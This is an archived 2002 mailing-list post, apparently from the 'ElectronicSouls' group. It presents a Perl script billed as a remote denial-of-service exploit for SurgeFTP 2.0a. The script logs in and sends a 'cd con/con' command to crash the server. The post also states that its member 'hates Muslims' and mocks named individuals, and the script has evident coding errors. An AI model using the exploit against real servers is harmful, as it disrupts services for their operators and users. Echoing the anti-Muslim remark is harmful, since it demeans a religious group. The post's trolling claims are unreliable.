lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - BuRn-X

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Our esteemed senior member, BuRn-X, is a well-respected security
professional in New York City.  He hates Muslims, and can write better
code than Brian McWilliams.

Here's an example.

# cat surgeftp-dos.pl
#!/usr/bin/perl
# [ElectronicSouls]
# Surge FTP Server 2.0a Remote DoS
# Coded by BuRn-X
# Just another lame windows DoS ;-)

print "!! ElectronicSouls Presents: !!\n";
print "SurgeFTP-DoS.pl: Remote DoS for SurgeFTP 2.0a\n";

$ARGC=@...V;
if ($ARGC <3) {
      print "./surgeftp-dos.pl <host> <port> <username> <password>\n";
        exit;
}
use Socket;


my($remote,$port,$inetaddr,$portaddr,$protocol);
$remote=$ARGV[0];
$port =$ARGV[1];
$username=$ARGV[2];
$pass=$ARGV[3];

print "[*] Sending Exploitation to $remote \n";
$inetaddr = inet_aton($remote) or die "Got Fucked Up: $!";
$portaddr = sockaddr_in($port, $iaddr) or die "Got Fucked Up: $!";
$protocol = getprotobyname('tcp') or die "Got Fucked Up: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $protocol) or die "Got Fucked Up: $!";
connect(SOCK, $portaddr) or die "Got Fucked Up: $!";;
$msg = "USER $username\n";
send(SOCK, $msg, 0) or die "Cant send packet: $!";
$msg = "PASS $pass\n";
send(SOCK, $msg, 0) or die "Cant send packet: $!";
$msg = "cd con/con\n";
send(SOCK, $msg, 0) or die "Cant send packet: $!";
$msg = "quit\n";

print "[*]: Done! \n";
exit;

#

Thanks to Chris Wysopal for helping out with the shellcode.

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Pass me the doobs."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nJCkMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltreUAoKhQCNWzypq1
75o/+mZdlb1OqPX6AKCtRmCySmKmNzw5zCG1vHoRvaCfnQ==
=WxTD
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ